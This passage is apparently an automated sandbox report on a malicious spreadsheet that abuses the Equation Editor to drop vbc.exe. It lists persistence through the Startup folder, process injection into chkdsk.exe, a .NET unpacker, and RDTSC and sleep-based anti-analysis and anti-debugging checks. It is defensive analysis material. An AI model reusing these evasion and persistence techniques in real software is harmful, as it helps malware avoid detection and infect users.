Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe
Source: unknown Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: unknown Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: unknown Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe File written: C:\Users\user\AppData\Roaming\98-QN40B\98-logri.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: PO11272020.xlsx Static file information: File size 2454528 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: netstat.pdb source: vbc.exe, 00000005.00000002.2237473398.0000000000469000.00000004.00000020.sdmp
Source: Binary string: chkdsk.pdb source: vbc.exe, 00000008.00000002.2225152811.00000000004E4000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, chkdsk.exe
Source: Binary string: c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\browser\app\firefox.pdb source: chkdsk.exe, 00000009.00000003.2255516069.0000000003C40000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\Testeconnect\obj\Debug\Testeconnect.pdb source: vbc.exe
Source: Binary string: C:\Users\Administrator\Desktop\Testeconnect\obj\Debug\Testeconnect.pdb' source: vbc.exe, 00000004.00000002.2191903785.0000000000738000.00000004.00000020.sdmp
Source: PO11272020.xlsx Initial sample: OLE indicators vbamacros = False
Source: PO11272020.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: vbc[1].exe.2.dr, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: vbc.exe.2.dr, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: vbc.exe.4.dr, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.vbc.exe.d70000.2.unpack, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.vbc.exe.d70000.0.unpack, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.d70000.0.unpack, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.vbc.exe.d70000.3.unpack, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.vbc.exe.f20000.2.unpack, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.vbc.exe.f20000.0.unpack, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.vbc.exe.f20000.3.unpack, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.f20000.0.unpack, Testeconnect/Form2.cs .Net Code: HAJWD732JH7WA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Binary contains a suspicious time stamp
Source: initial sample Static PE information: 0xE41D24F5 [Wed Apr 11 07:34:13 2091 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00190C59 push esp; iretd 4_2_00190D45
Source: C:\Users\Public\vbc.exe Code function: 4_2_00197F20 pushfd ; ret 4_2_00198129
Source: C:\Users\Public\vbc.exe Code function: 4_2_00198122 pushfd ; ret 4_2_00198129
Source: C:\Users\Public\vbc.exe Code function: 4_2_00190277 push esp; iretd 4_2_00190281
Source: C:\Users\Public\vbc.exe Code function: 4_2_00198BB8 push eax; retf 4_2_00198BC1
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D0D2 push eax; ret 5_2_0041D0D8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D0DB push eax; ret 5_2_0041D142
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D085 push eax; ret 5_2_0041D0D8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D13C push eax; ret 5_2_0041D142
Source: C:\Users\Public\vbc.exe Code function: 5_2_00407AD0 pushad ; iretd 5_2_00407ADC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00405DE1 push ds; iretd 5_2_00405DE7
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041659B push ecx; ret 5_2_004165A2
Source: C:\Users\Public\vbc.exe Code function: 5_2_0084DFA1 push ecx; ret 5_2_0084DFB4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00390C59 push esp; iretd 7_2_00390D45
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00397F20 pushfd ; ret 7_2_00398129
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00398122 pushfd ; ret 7_2_00398129
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00390277 push esp; iretd 7_2_00390281
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00398BB8 push eax; retf 7_2_00398BC1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041D0D2 push eax; ret 8_2_0041D0D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041D0DB push eax; ret 8_2_0041D142
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041D085 push eax; ret 8_2_0041D0D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041D13C push eax; ret 8_2_0041D142
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00407AD0 pushad ; iretd 8_2_00407ADC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00405DE1 push ds; iretd 8_2_00405DE7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041659B push ecx; ret 8_2_004165A2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008CDFA1 push ecx; ret 8_2_008CDFB4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0254DFA1 push ecx; ret 9_2_0254DFB4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0009D085 push eax; ret 9_2_0009D0D8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0009D0DB push eax; ret 9_2_0009D142
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0009D0D2 push eax; ret 9_2_0009D0D8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0009D13C push eax; ret 9_2_0009D142
Source: initial sample Static PE information: section name: .text entropy: 7.93997758183
Source: initial sample Static PE information: section name: .text entropy: 7.93997758183
Source: initial sample Static PE information: section name: .text entropy: 7.93997758183

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the startup folder
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Jump to dropped file
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: PO11272020.xlsx Stream path 'EncryptedPackage' entropy: 7.9999248079 (max. 8.0)

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe RDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 00000000001098E4 second address: 00000000001098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 0000000000109B4E second address: 0000000000109B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409A80 rdtsc 5_2_00409A80
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2472 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 260 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 260 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2660 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 2520 Thread sleep time: -58000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe TID: 2956 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 2200 Thread sleep time: -32000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\ Jump to behavior
Source: explorer.exe, 00000006.00000000.2194662661.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2206084235.0000000004234000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.2206127448.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000006.00000000.2205994745.00000000041AD000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.2194693430.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugFlags Jump to behavior
Source: C:\Users\Public\vbc.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process queried: DebugFlags Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409A80 rdtsc 5_2_00409A80
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 5_2_0040ACC0 LdrLoadDll, 5_2_0040ACC0
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_00580017 mov eax, dword ptr fs:[00000030h] 4_2_00580017
Source: C:\Users\Public\vbc.exe Code function: 5_2_00830080 mov ecx, dword ptr fs:[00000030h] 5_2_00830080
Source: C:\Users\Public\vbc.exe Code function: 5_2_008300EA mov eax, dword ptr fs:[00000030h] 5_2_008300EA
Source: C:\Users\Public\vbc.exe Code function: 5_2_008526F8 mov eax, dword ptr fs:[00000030h] 5_2_008526F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008B0080 mov ecx, dword ptr fs:[00000030h] 8_2_008B0080
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008B00EA mov eax, dword ptr fs:[00000030h] 8_2_008B00EA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008D26F8 mov eax, dword ptr fs:[00000030h] 8_2_008D26F8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025526F8 mov eax, dword ptr fs:[00000030h] 9_2_025526F8
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Process token adjusted: Debug Jump to behavior
